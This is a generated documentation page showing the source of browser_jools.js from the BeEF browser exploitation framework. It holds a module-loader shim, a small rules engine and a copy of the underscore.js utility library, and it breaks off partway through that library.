<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/lib_browser_jools.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: lib/browser_jools.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: lib/browser_jools.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>/**
* @namespace browser_jools
*/
/**
* @memberof browser_jools
* @param file
* @param cwd
*/
var require = function (file, cwd) {
var resolved = require.resolve(file, cwd || '/');
var mod = require.modules[resolved];
if (!mod) throw new Error(
'Failed to resolve module ' + file + ', tried ' + resolved
);
var res = mod._cached ? mod._cached : mod();
return res;
}
require.paths = [];
require.modules = {};
require.extensions = [".js",".coffee"];
require._core = {
'assert': true,
'events': true,
'fs': true,
'path': true,
'vm': true
};
/**
* @memberof browser_jools
*/
require.resolve = (function () {
return function (x, cwd) {
if (!cwd) cwd = '/';
if (require._core[x]) return x;
var path = require.modules.path();
cwd = path.resolve('/', cwd);
var y = cwd || '/';
if (x.match(/^(?:\.\.?\/|\/)/)) {
var m = loadAsFileSync(path.resolve(y, x))
|| loadAsDirectorySync(path.resolve(y, x));
if (m) return m;
}
var n = loadNodeModulesSync(x, y);
if (n) return n;
throw new Error("Cannot find module '" + x + "'");
function loadAsFileSync (x) {
if (require.modules[x]) {
return x;
}
for (var i = 0; i < require.extensions.length; i++) {
var ext = require.extensions[i];
if (require.modules[x + ext]) return x + ext;
}
}
function loadAsDirectorySync (x) {
x = x.replace(/\/+$/, '');
var pkgfile = x + '/package.json';
if (require.modules[pkgfile]) {
var pkg = require.modules[pkgfile]();
var b = pkg.browserify;
if (typeof b === 'object' && b.main) {
var m = loadAsFileSync(path.resolve(x, b.main));
if (m) return m;
}
else if (typeof b === 'string') {
var m = loadAsFileSync(path.resolve(x, b));
if (m) return m;
}
else if (pkg.main) {
var m = loadAsFileSync(path.resolve(x, pkg.main));
if (m) return m;
}
}
return loadAsFileSync(x + '/index');
}
function loadNodeModulesSync (x, start) {
var dirs = nodeModulesPathsSync(start);
for (var i = 0; i < dirs.length; i++) {
var dir = dirs[i];
var m = loadAsFileSync(dir + '/' + x);
if (m) return m;
var n = loadAsDirectorySync(dir + '/' + x);
if (n) return n;
}
var m = loadAsFileSync(x);
if (m) return m;
}
function nodeModulesPathsSync (start) {
var parts;
if (start === '/') parts = [ '' ];
else parts = path.normalize(start).split('/');
var dirs = [];
for (var i = parts.length - 1; i >= 0; i--) {
if (parts[i] === 'node_modules') continue;
var dir = parts.slice(0, i + 1).join('/') + '/node_modules';
dirs.push(dir);
}
return dirs;
}
};
})();
/**
* @memberof browser_jools
*/
require.alias = function (from, to) {
var path = require.modules.path();
var res = null;
try {
res = require.resolve(from + '/package.json', '/');
}
catch (err) {
res = require.resolve(from, '/');
}
var basedir = path.dirname(res);
var keys = (Object.keys || function (obj) {
var res = [];
for (var key in obj) res.push(key)
return res;
})(require.modules);
for (var i = 0; i < keys.length; i++) {
var key = keys[i];
if (key.slice(0, basedir.length + 1) === basedir + '/') {
var f = key.slice(basedir.length);
require.modules[to + f] = require.modules[basedir + f];
}
else if (key === basedir) {
require.modules[to] = require.modules[basedir];
}
}
};
/**
* @memberof browser_jools
*/
require.define = function (filename, fn) {
var dirname = require._core[filename]
? ''
: require.modules.path().dirname(filename)
;
var require_ = function (file) {
return require(file, dirname)
};
require_.resolve = function (name) {
return require.resolve(name, dirname);
};
require_.modules = require.modules;
require_.define = require.define;
var module_ = { exports : {} };
require.modules[filename] = function () {
require.modules[filename]._cached = module_.exports;
fn.call(
module_.exports,
require_,
module_,
module_.exports,
dirname,
filename
);
require.modules[filename]._cached = module_.exports;
return module_.exports;
};
};
if (typeof process === 'undefined') process = {};
if (!process.nextTick) process.nextTick = (function () {
var queue = [];
var canPost = typeof window !== 'undefined'
&& window.postMessage && window.addEventListener
;
if (canPost) {
window.addEventListener('message', function (ev) {
if (ev.source === window && ev.data === 'browserify-tick') {
ev.stopPropagation();
if (queue.length > 0) {
var fn = queue.shift();
fn();
}
}
}, true);
}
return function (fn) {
if (canPost) {
queue.push(fn);
window.postMessage('browserify-tick', '*');
}
else setTimeout(fn, 0);
};
})();
if (!process.title) process.title = 'browser';
if (!process.binding) process.binding = function (name) {
if (name === 'evals') return require('vm')
else throw new Error('No such module')
};
if (!process.cwd) process.cwd = function () { return '.' };
if (!process.env) process.env = {};
if (!process.argv) process.argv = [];
require.define("path", function (require, module, exports, __dirname, __filename) {
function filter (xs, fn) {
var res = [];
for (var i = 0; i < xs.length; i++) {
if (fn(xs[i], i, xs)) res.push(xs[i]);
}
return res;
}
/**
* resolves . and .. elements in a path array with directory names there
* must be no slashes, empty elements, or device names (c:\) in the array
* (so also no leading and trailing slashes - it does not distinguish
* relative and absolute paths)
* @memberof browser_jools
* @param parts
* @param allowAboveRoot
*/
function normalizeArray(parts, allowAboveRoot) {
// if the path tries to go above the root, `up` ends up > 0
var up = 0;
for (var i = parts.length; i >= 0; i--) {
var last = parts[i];
if (last == '.') {
parts.splice(i, 1);
} else if (last === '..') {
parts.splice(i, 1);
up++;
} else if (up) {
parts.splice(i, 1);
up--;
}
}
// if the path is allowed to go above the root, restore leading ..s
if (allowAboveRoot) {
for (; up--; up) {
parts.unshift('..');
}
}
return parts;
}
// Regex to split a filename into [*, dir, basename, ext]
// posix version
var splitPathRe = /^(.+\/(?!$)|\/)?((?:.+?)?(\.[^.]*)?)$/;
// path.resolve([from ...], to)
// posix version
exports.resolve = function() {
var resolvedPath = '',
resolvedAbsolute = false;
for (var i = arguments.length; i >= -1 && !resolvedAbsolute; i--) {
var path = (i >= 0)
? arguments[i]
: process.cwd();
// Skip empty and invalid entries
if (typeof path !== 'string' || !path) {
continue;
}
resolvedPath = path + '/' + resolvedPath;
resolvedAbsolute = path.charAt(0) === '/';
}
// At this point the path should be resolved to a full absolute path, but
// handle relative paths to be safe (might happen when process.cwd() fails)
// Normalize the path
resolvedPath = normalizeArray(filter(resolvedPath.split('/'), function(p) {
return !!p;
}), !resolvedAbsolute).join('/');
return ((resolvedAbsolute ? '/' : '') + resolvedPath) || '.';
};
// path.normalize(path)
// posix version
exports.normalize = function(path) {
var isAbsolute = path.charAt(0) === '/',
trailingSlash = path.slice(-1) === '/';
// Normalize the path
path = normalizeArray(filter(path.split('/'), function(p) {
return !!p;
}), !isAbsolute).join('/');
if (!path && !isAbsolute) {
path = '.';
}
if (path && trailingSlash) {
path += '/';
}
return (isAbsolute ? '/' : '') + path;
};
// posix version
exports.join = function() {
var paths = Array.prototype.slice.call(arguments, 0);
return exports.normalize(filter(paths, function(p, index) {
return p && typeof p === 'string';
}).join('/'));
};
exports.dirname = function(path) {
var dir = splitPathRe.exec(path)[1] || '';
var isWindows = false;
if (!dir) {
// No dirname
return '.';
} else if (dir.length === 1 ||
(isWindows && dir.length <= 3 && dir.charAt(1) === ':')) {
// It is just a slash or a drive letter with a slash
return dir;
} else {
// It is a full dirname, strip trailing slash
return dir.substring(0, dir.length - 1);
}
};
exports.basename = function(path, ext) {
var f = splitPathRe.exec(path)[2] || '';
// TODO: make this comparison case-insensitive on windows?
if (ext && f.substr(-1 * ext.length) === ext) {
f = f.substr(0, f.length - ext.length);
}
return f;
};
exports.extname = function(path) {
return splitPathRe.exec(path)[3] || '';
};
});
require.define("/node_modules/jools/package.json", function (require, module, exports, __dirname, __filename) {
module.exports = {"main":"./lib/jools"}
});
require.define("/node_modules/jools/lib/jools.js", function (require, module, exports, __dirname, __filename) {
/**
* Module dependencies.
*/
var utils = require('./utils')
, _ = require('underscore');
/**
* version
* @memberof browser_jools
*/
exports.version = '0.0.1';
/**
* Jools constructor.
*
* A rule consists of:
* - Descriptive name
* - One or more conditions
* - One or more consequences, which are fired when all conditions evaluate to true.
* @memberof browser_jools
* @param {Object} rules
*/
function Jools(rules) {
this.rules = rules;
}
/**
* execute rules with fact
*
* @param {Object} fact
*/
Jools.prototype.execute = function (fact) {
var self = this
, session = _.clone(fact)
, last_session = _.clone(fact)
, goal = false;
while (!goal) {
var changes = false;
for (var x=0; x < this.rules.length; x++) {
var rule = this.rules[x]
, outcome;
_.flatten([rule.condition]).forEach(function (cnd) {
cnd.__args = cnd.__args || utils.paramNames(cnd);
if (outcome) {
outcome = outcome && cnd.apply({}, utils.paramsToArguments(session, cnd.__args));
} else {
outcome = cnd.apply({}, utils.paramsToArguments(session, cnd.__args));
}
});
if (outcome) {
_.flatten([rule.consequence]).forEach(function (csq) {
csq.__args = csq.__args || utils.paramNames(csq);
csq.apply(session, utils.paramsToArguments(fact, csq.__args));
if (!_.isEqual(last_session,session)) {
// Fire all rules again!
changes = true;
last_session = _.clone(session);
}
});
}
if(changes) break;
}
if (!changes) goal = true;
}
return session;
};
module.exports = Jools;
});
require.define("/node_modules/jools/lib/utils.js", function (require, module, exports, __dirname, __filename) {
/**
* Returns an array of parameter names of the function f
* @memberof browser_jools
* @param {Function} f
*/
module.exports.paramNames = function (f) {
var m = /function[^\(]*\(([^\)]*)\)/.exec(f.toString());
if (!m) throw new TypeError("Invalid functions");
var params = [];
m[1].split(',').forEach(function (p) {
params.push(p.replace(/^\s*|\s*$/g, ''));
});
return params;
};
/**
* Creates an array of arguments
* @memberof browser_jools
* @param {Object} obj
* @param {Array} params
*/
module.exports.paramsToArguments = function (obj, params) {
var args = [];
params.forEach(function (p) {
args.push(obj[p]);
});
return args;
}
});
require.define("/node_modules/underscore/package.json", function (require, module, exports, __dirname, __filename) {
module.exports = {"main":"underscore.js"}
});
require.define("/node_modules/underscore/underscore.js", function (require, module, exports, __dirname, __filename) {
// Underscore.js 1.3.3
// (c) 2009-2012 Jeremy Ashkenas, DocumentCloud Inc.
// Underscore is freely distributable under the MIT license.
// Portions of Underscore are inspired or borrowed from Prototype,
// Oliver Steele's Functional, and John Resig's Micro-Templating.
// For all details and documentation:
// http://documentcloud.github.com/underscore
(function() {
// Baseline setup
// --------------
// Establish the root object, `window` in the browser, or `global` on the server.
var root = this;
// Save the previous value of the `_` variable.
var previousUnderscore = root._;
// Establish the object that gets returned to break out of a loop iteration.
var breaker = {};
// Save bytes in the minified (but not gzipped) version:
var ArrayProto = Array.prototype, ObjProto = Object.prototype, FuncProto = Function.prototype;
// Create quick reference variables for speed access to core prototypes.
var slice = ArrayProto.slice,
unshift = ArrayProto.unshift,
toString = ObjProto.toString,
hasOwnProperty = ObjProto.hasOwnProperty;
// All **ECMAScript 5** native function implementations that we hope to use
// are declared here.
var
nativeForEach = ArrayProto.forEach,
nativeMap = ArrayProto.map,
nativeReduce = ArrayProto.reduce,
nativeReduceRight = ArrayProto.reduceRight,
nativeFilter = ArrayProto.filter,
nativeEvery = ArrayProto.every,
nativeSome = ArrayProto.some,
nativeIndexOf = ArrayProto.indexOf,
nativeLastIndexOf = ArrayProto.lastIndexOf,
nativeIsArray = Array.isArray,
nativeKeys = Object.keys,
nativeBind = FuncProto.bind;
// Create a safe reference to the Underscore object for use below.
var _ = function(obj) { return new wrapper(obj); };
// Export the Underscore object for **Node.js**, with
// backwards-compatibility for the old `require()` API. If we're in
// the browser, add `_` as a global object via a string identifier,
// for Closure Compiler "advanced" mode.
if (typeof exports !== 'undefined') {
if (typeof module !== 'undefined' && module.exports) {
exports = module.exports = _;
}
exports._ = _;
} else {
root['_'] = _;
}
// Current version.
_.VERSION = '1.3.3';
// Collection Functions
// --------------------
// The cornerstone, an `each` implementation, aka `forEach`.
// Handles objects with the built-in `forEach`, arrays, and raw objects.
// Delegates to **ECMAScript 5**'s native `forEach` if available.
var each = _.each = _.forEach = function(obj, iterator, context) {
if (obj == null) return;
if (nativeForEach && obj.forEach === nativeForEach) {
obj.forEach(iterator, context);
} else if (obj.length === +obj.length) {
for (var i = 0, l = obj.length; i < l; i++) {
if (i in obj && iterator.call(context, obj[i], i, obj) === breaker) return;
}
} else {
for (var key in obj) {
if (_.has(obj, key)) {
if (iterator.call(context, obj[key], key, obj) === breaker) return;
}
}
}
};
// Return the results of applying the iterator to each element.
// Delegates to **ECMAScript 5**'s native `map` if available.
_.map = _.collect = function(obj, iterator, context) {
var results = [];
if (obj == null) return results;
if (nativeMap && obj.map === nativeMap) return obj.map(iterator, context);
each(obj, function(value, index, list) {
results[results.length] = iterator.call(context, value, index, list);
});
if (obj.length === +obj.length) results.length = obj.length;
return results;
};
// **Reduce** builds up a single result from a list of values, aka `inject`,
// or `foldl`. Delegates to **ECMAScript 5**'s native `reduce` if available.
_.reduce = _.foldl = _.inject = function(obj, iterator, memo, context) {
var initial = arguments.length > 2;
if (obj == null) obj = [];
if (nativeReduce && obj.reduce === nativeReduce) {
if (context) iterator = _.bind(iterator, context);
return initial ? obj.reduce(iterator, memo) : obj.reduce(iterator);
}
each(obj, function(value, index, list) {
if (!initial) {
memo = value;
initial = true;
} else {
memo = iterator.call(context, memo, value, index, list);
}
});
if (!initial) throw new TypeError('Reduce of empty array with no initial value');
return memo;
};
// The right-associative version of reduce, also known as `foldr`.
// Delegates to **ECMAScript 5**'s native `reduceRight` if available.
_.reduceRight = _.foldr = function(obj, iterator, memo, context) {
var initial = arguments.length > 2;
if (obj == null) obj = [];
if (nativeReduceRight && obj.reduceRight === nativeReduceRight) {
if (context) iterator = _.bind(iterator, context);
return initial ? obj.reduceRight(iterator, memo) : obj.reduceRight(iterator);
}
var reversed = _.toArray(obj).reverse();
if (context && !initial) iterator = _.bind(iterator, context);
return initial ? _.reduce(reversed, iterator, memo, context) : _.reduce(reversed, iterator);
};
// Return the first value which passes a truth test. Aliased as `detect`.
_.find = _.detect = function(obj, iterator, context) {
var result;
any(obj, function(value, index, list) {
if (iterator.call(context, value, index, list)) {
result = value;
return true;
}
});
return result;
};
// Return all the elements that pass a truth test.
// Delegates to **ECMAScript 5**'s native `filter` if available.
// Aliased as `select`.
_.filter = _.select = function(obj, iterator, context) {
var results = [];
if (obj == null) return results;
if (nativeFilter && obj.filter === nativeFilter) return obj.filter(iterator, context);
each(obj, function(value, index, list) {
if (iterator.call(context, value, index, list)) results[results.length] = value;
});
return results;
};
// Return all the elements for which a truth test fails.
_.reject = function(obj, iterator, context) {
var results = [];
if (obj == null) return results;
each(obj, function(value, index, list) {
if (!iterator.call(context, value, index, list)) results[results.length] = value;
});
return results;
};
// Determine whether all of the elements match a truth test.
// Delegates to **ECMAScript 5**'s native `every` if available.
// Aliased as `all`.
_.every = _.all = function(obj, iterator, context) {
var result = true;
if (obj == null) return result;
if (nativeEvery && obj.every === nativeEvery) return obj.every(iterator, context);
each(obj, function(value, index, list) {
if (!(result = result && iterator.call(context, value, index, list))) return breaker;
});
return !!result;
};
// Determine if at least one element in the object matches a truth test.
// Delegates to **ECMAScript 5**'s native `some` if available.
// Aliased as `any`.
var any = _.some = _.any = function(obj, iterator, context) {
iterator || (iterator = _.identity);
var result = false;
if (obj == null) return result;
if (nativeSome && obj.some === nativeSome) return obj.some(iterator, context);
each(obj, function(value, index, list) {
if (result || (result = iterator.call(context, value, index, list))) return breaker;
});
return !!result;
};
// Determine if a given value is included in the array or object using `===`.
// Aliased as `contains`.
_.include = _.contains = function(obj, target) {
var found = false;
if (obj == null) return found;
if (nativeIndexOf && obj.indexOf === nativeIndexOf) return obj.indexOf(target) != -1;
found = any(obj, function(value) {
return value === target;
});
return found;
};
// Invoke a method (with arguments) on every item in a collection.
_.invoke = function(obj, method) {
var args = slice.call(arguments, 2);
return _.map(obj, function(value) {
return (_.isFunction(method) ? method || value : value[method]).apply(value, args);
});
};
// Convenience version of a common use case of `map`: fetching a property.
_.pluck = function(obj, key) {
return _.map(obj, function(value){ return value[key]; });
};
// Return the maximum element or (element-based computation).
_.max = function(obj, iterator, context) {
if (!iterator && _.isArray(obj) && obj[0] === +obj[0]) return Math.max.apply(Math, obj);
if (!iterator && _.isEmpty(obj)) return -Infinity;
var result = {computed : -Infinity};
each(obj, function(value, index, list) {
var computed = iterator ? iterator.call(context, value, index, list) : value;
computed >= result.computed && (result = {value : value, computed : computed});
});
return result.value;
};
// Return the minimum element (or element-based computation).
_.min = function(obj, iterator, context) {
if (!iterator && _.isArray(obj) && obj[0] === +obj[0]) return Math.min.apply(Math, obj);
if (!iterator && _.isEmpty(obj)) return Infinity;
var result = {computed : Infinity};
each(obj, function(value, index, list) {
var computed = iterator ? iterator.call(context, value, index, list) : value;
computed < result.computed && (result = {value : value, computed : computed});
});
return result.value;
};
// Shuffle an array.
_.shuffle = function(obj) {
var shuffled = [], rand;
each(obj, function(value, index, list) {
rand = Math.floor(Math.random() * (index + 1));
shuffled[index] = shuffled[rand];
shuffled[rand] = value;
});
return shuffled;
};
// Sort the object's values by a criterion produced by an iterator.
_.sortBy = function(obj, val, context) {
var iterator = _.isFunction(val) ? val : function(obj) { return obj[val]; };
return _.pluck(_.map(obj, function(value, index, list) {
return {
value : value,
criteria : iterator.call(context, value, index, list)
};
}).sort(function(left, right) {
var a = left.criteria, b = right.criteria;
if (a === void 0) return 1;
if (b === void 0) return -1;
return a < b ? -1 : a > b ? 1 : 0;
}), 'value');
};
// Groups the object's values by a criterion. Pass either a string attribute
// to group by, or a function that returns the criterion.
_.groupBy = function(obj, val) {
var result = {};
var iterator = _.isFunction(val) ? val : function(obj) { return obj[val]; };
each(obj, function(value, index) {
var key = iterator(value, index);
(result[key] || (result[key] = [])).push(value);
});
return result;
};
// Use a comparator function to figure out at what index an object should
// be inserted so as to maintain order. Uses binary search.
_.sortedIndex = function(array, obj, iterator) {
iterator || (iterator = _.identity);
var low = 0, high = array.length;
while (low < high) {
var mid = (low + high) >> 1;
iterator(array[mid]) < iterator(obj) ? low = mid + 1 : high = mid;
}
return low;
};
// Safely convert anything iterable into a real, live array.
_.toArray = function(obj) {
if (!obj) return [];
if (_.isArray(obj)) return slice.call(obj);
if (_.isArguments(obj)) return slice.call(obj);
if (obj.toArray && _.isFunction(obj.toArray)) return obj.toArray();
return _.values(obj);
};
// Return the number of elements in an object.
_.size = function(obj) {
return _.isArray(obj) ? obj.length : _.keys(obj).length;
};
// Array Functions
// ---------------
// Get the first element of an array. Passing **n** will return the first N
// values in the array. Aliased as `head` and `take`. The **guard** check
// allows it to work with `_.map`.
_.first = _.head = _.take = function(array, n, guard) {
return (n != null) && !guard ? slice.call(array, 0, n) : array[0];
};
// Returns everything but the last entry of the array. Especcialy useful on
// the arguments object. Passing **n** will return all the values in
// the array, excluding the last N. The **guard** check allows it to work with
// `_.map`.
_.initial = function(array, n, guard) {
return slice.call(array, 0, array.length - ((n == null) || guard ? 1 : n));
};
// Get the last element of an array. Passing **n** will return the last N
// values in the array. The **guard** check allows it to work with `_.map`.
_.last = function(array, n, guard) {
if ((n != null) && !guard) {
return slice.call(array, Math.max(array.length - n, 0));
} else {
return array[array.length - 1];
}
};
// Returns everything but the first entry of the array. Aliased as `tail`.
// Especially useful on the arguments object. Passing an **index** will return
// the rest of the values in the array from that index onward. The **guard**
// check allows it to work with `_.map`.
_.rest = _.tail = function(array, index, guard) {
return slice.call(array, (index == null) || guard ? 1 : index);
};
// Trim out all falsy values from an array.
_.compact = function(array) {
return _.filter(array, function(value){ return !!value; });
};
// Return a completely flattened version of an array.
_.flatten = function(array, shallow) {
return _.reduce(array, function(memo, value) {
if (_.isArray(value)) return memo.concat(shallow ? value : _.flatten(value));
memo[memo.length] = value;
return memo;
}, []);
};
// Return a version of the array that does not contain the specified value(s).
_.without = function(array) {
return _.difference(array, slice.call(arguments, 1));
};
// Produce a duplicate-free version of the array. If the array has already
// been sorted, you have the option of using a faster algorithm.
// Aliased as `unique`.
_.uniq = _.unique = function(array, isSorted, iterator) {
var initial = iterator ? _.map(array, iterator) : array;
var results = [];
// The `isSorted` flag is irrelevant if the array only contains two elements.
if (array.length < 3) isSorted = true;
_.reduce(initial, function (memo, value, index) {
if (isSorted ? _.last(memo) !== value || !memo.length : !_.include(memo, value)) {
memo.push(value);
results.push(array[index]);
}
return memo;
}, []);
return results;
};
// Produce an array that contains the union: each distinct element from all of
// the passed-in arrays.
_.union = function() {
return _.uniq(_.flatten(arguments, true));
};
// Produce an array that contains every item shared between all the
// passed-in arrays. (Aliased as "intersect" for back-compat.)
_.intersection = _.intersect = function(array) {
var rest = slice.call(arguments, 1);
return _.filter(_.uniq(array), function(item) {
return _.every(rest, function(other) {
return _.indexOf(other, item) >= 0;
});
});
};
// Take the difference between one array and a number of other arrays.
// Only the elements present in just the first array will remain.
_.difference = function(array) {
var rest = _.flatten(slice.call(arguments, 1), true);
return _.filter(array, function(value){ return !_.include(rest, value); });
};
// Zip together multiple lists into a single array -- elements that share
// an index go together.
_.zip = function() {
var args = slice.call(arguments);
var length = _.max(_.pluck(args, 'length'));
var results = new Array(length);
for (var i = 0; i < length; i++) results[i] = _.pluck(args, "" + i);
return results;
};
// If the browser doesn't supply us with indexOf (I'm looking at you, **MSIE**),
// we need this function. Return the position of the first occurrence of an
// item in an array, or -1 if the item is not included in the array.
// Delegates to **ECMAScript 5**'s native `indexOf` if available.
// If the array is large and already in sort order, pass `true`
// for **isSorted** to use binary search.
_.indexOf = function(array, item, isSorted) {
if (array == null) return -1;
var i, l;
if (isSorted) {
i = _.sortedIndex(array, item);
return array[i] === item ? i : -1;
}
if (nativeIndexOf && array.indexOf === nativeIndexOf) return array.indexOf(item);
for (i = 0, l = array.length; i < l; i++) if (i in array && array[i] === item) return i;
return -1;
};
// Delegates to **ECMAScript 5**'s native `lastIndexOf` if available.
_.lastIndexOf = function(array, item) {
if (array == null) return -1;
if (nativeLastIndexOf && array.lastIndexOf === nativeLastIndexOf) return array.lastIndexOf(item);
var i = array.length;
while (i--) if (i in array && array[i] === item) return i;
return -1;
};
// Generate an integer Array containing an arithmetic progression. A port of
// the native Python `range()` function. See
// [the Python documentation](http://docs.python.org/library/functions.html#range).
_.range = function(start, stop, step) {
if (arguments.length <= 1) {
stop = start || 0;
start = 0;
}
step = arguments[2] || 1;
var len = Math.max(Math.ceil((stop - start) / step), 0);
var idx = 0;
var range = new Array(len);
while(idx < len) {
range[idx++] = start;
start += step;
}
return range;
};
// Function (ahem) Functions
// ------------------
// Reusable constructor function for prototype setting.
var ctor = function(){};
// Create a function bound to a given object (assigning `this`, and arguments,
// optionally). Binding with arguments is also known as `curry`.
// Delegates to **ECMAScript 5**'s native `Function.bind` if available.
// We check for `func.bind` first, to fail fast when `func` is undefined.
_.bind = function bind(func, context) {
var bound, args;
if (func.bind === nativeBind && nativeBind) return nativeBind.apply(func, slice.call(arguments, 1));
if (!_.isFunction(func)) throw new TypeError;
args = slice.call(arguments, 2);
return bound = function() {
if (!(this instanceof bound)) return func.apply(context, args.concat(slice.call(arguments)));
ctor.prototype = func.prototype;
var self = new ctor;
var result = func.apply(self, args.concat(slice.call(arguments)));
if (Object(result) === result) return result;
return self;
};
};
// Bind all of an object's methods to that object. Useful for ensuring that
// all callbacks defined on an object belong to it.
_.bindAll = function(obj) {
var funcs = slice.call(arguments, 1);
if (funcs.length == 0) funcs = _.functions(obj);
each(funcs, function(f) { obj[f] = _.bind(obj[f], obj); });
return obj;
};
// Memoize an expensive function by storing its results.
_.memoize = function(func, hasher) {
var memo = {};
hasher || (hasher = _.identity);
return function() {
var key = hasher.apply(this, arguments);
return _.has(memo, key) ? memo[key] : (memo[key] = func.apply(this, arguments));
};
};
// Delays a function for the given number of milliseconds, and then calls
// it with the arguments supplied.
_.delay = function(func, wait) {
var args = slice.call(arguments, 2);
return setTimeout(function(){ return func.apply(null, args); }, wait);
};
// Defers a function, scheduling it to run after the current call stack has
// cleared.
_.defer = function(func) {
return _.delay.apply(_, [func, 1].concat(slice.call(arguments, 1)));
};
// Returns a function, that, when invoked, will only be triggered at most once
// during a given window of time.
_.throttle = function(func, wait) {
var context, args, timeout, throttling, more, result;
var whenDone = _.debounce(function(){ more = throttling = false; }, wait);
return function() {
context = this; args = arguments;
var later = function() {
timeout = null;
if (more) func.apply(context, args);
whenDone();
};
if (!timeout) timeout = setTimeout(later, wait);
if (throttling) {
more = true;
} else {
result = func.apply(context, args);
}
whenDone();
throttling = true;
return result;
};
};
// Returns a function, that, as long as it continues to be invoked, will not
// be triggered. The function will be called after it stops being called for
// N milliseconds. If `immediate` is passed, trigger the function on the
// leading edge, instead of the trailing.
_.debounce = function(func, wait, immediate) {
var timeout;
return function() {
var context = this, args = arguments;
var later = function() {
timeout = null;
if (!immediate) func.apply(context, args);
};
if (immediate && !timeout) func.apply(context, args);
clearTimeout(timeout);
timeout = setTimeout(later, wait);
};
};
// Returns a function that will be executed at most one time, no matter how
// often you call it. Useful for lazy initialization.
_.once = function(func) {
var ran = false, memo;
return function() {
if (ran) return memo;
ran = true;
return memo = func.apply(this, arguments);
};
};
// Returns the first function passed as an argument to the second,
// allowing you to adjust arguments, run code before and after, and
// conditionally execute the original function.
_.wrap = function(func, wrapper) {
return function() {
var args = [func].concat(slice.call(arguments, 0));
return wrapper.apply(this, args);
};
};
// Returns a function that is the composition of a list of functions, each
// consuming the return value of the function that follows.
_.compose = function() {
var funcs = arguments;
return function() {
var args = arguments;
for (var i = funcs.length - 1; i >= 0; i--) {
args = [funcs[i].apply(this, args)];
}
return args[0];
};
};
// Returns a function that will only be executed after being called N times.
_.after = function(times, func) {
if (times <= 0) return func();
return function() {
if (--times < 1) { return func.apply(this, arguments); }
};
};
// Object Functions
// ----------------
// Retrieve the names of an object's properties.
// Delegates to **ECMAScript 5**'s native `Object.keys`
_.keys = nativeKeys || function(obj) {
if (obj !== Object(obj)) throw new TypeError('Invalid object');
var keys = [];
for (var key in obj) if (_.has(obj, key)) keys[keys.length] = key;
return keys;
};
// Retrieve the values of an object's properties.
_.values = function(obj) {
return _.map(obj, _.identity);
};
// Return a sorted list of the function names available on the object.
// Aliased as `methods`
_.functions = _.methods = function(obj) {
var names = [];
for (var key in obj) {
if (_.isFunction(obj[key])) names.push(key);
}
return names.sort();
};
// Extend a given object with all the properties in passed-in object(s).
_.extend = function(obj) {
each(slice.call(arguments, 1), function(source) {
for (var prop in source) {
obj[prop] = source[prop];
}
});
return obj;
};
// Return a copy of the object only containing the whitelisted properties.
_.pick = function(obj) {
var result = {};
each(_.flatten(slice.call(arguments, 1)), function(key) {
if (key in obj) result[key] = obj[key];
});
return result;
};
// Fill in a given object with default properties.
_.defaults = function(obj) {
each(slice.call(arguments, 1), function(source) {
for (var prop in source) {
if (obj[prop] == null) obj[prop] = source[prop];
}
});
return obj;
};
// Create a (shallow-cloned) duplicate of an object.
_.clone = function(obj) {
if (!_.isObject(obj)) return obj;
return _.isArray(obj) ? obj.slice() : _.extend({}, obj);
};
// Invokes interceptor with the obj, and then returns obj.
// The primary purpose of this method is to "tap into" a method chain, in
// order to perform operations on intermediate results within the chain.
_.tap = function(obj, interceptor) {
interceptor(obj);
return obj;
};
// Internal recursive comparison function.
function eq(a, b, stack) {
// Identical objects are equal. `0 === -0`, but they aren't identical.
// See the Harmony `egal` proposal: http://wiki.ecmascript.org/doku.php?id=harmony:egal.
if (a === b) return a !== 0 || 1 / a == 1 / b;
// A strict comparison is necessary because `null == undefined`.
if (a == null || b == null) return a === b;
// Unwrap any wrapped objects.
if (a._chain) a = a._wrapped;
if (b._chain) b = b._wrapped;
// Invoke a custom `isEqual` method if one is provided.
if (a.isEqual && _.isFunction(a.isEqual)) return a.isEqual(b);
if (b.isEqual && _.isFunction(b.isEqual)) return b.isEqual(a);
// Compare `[[Class]]` names.
var className = toString.call(a);
if (className != toString.call(b)) return false;
switch (className) {
// Strings, numbers, dates, and booleans are compared by value.
case '[object String]':
// Primitives and their corresponding object wrappers are equivalent; thus, `"5"` is
// equivalent to `new String("5")`.
return a == String(b);
case '[object Number]':
// `NaN`s are equivalent, but non-reflexive. An `egal` comparison is performed for
// other numeric values.
return a != +a ? b != +b : (a == 0 ? 1 / a == 1 / b : a == +b);
case '[object Date]':
case '[object Boolean]':
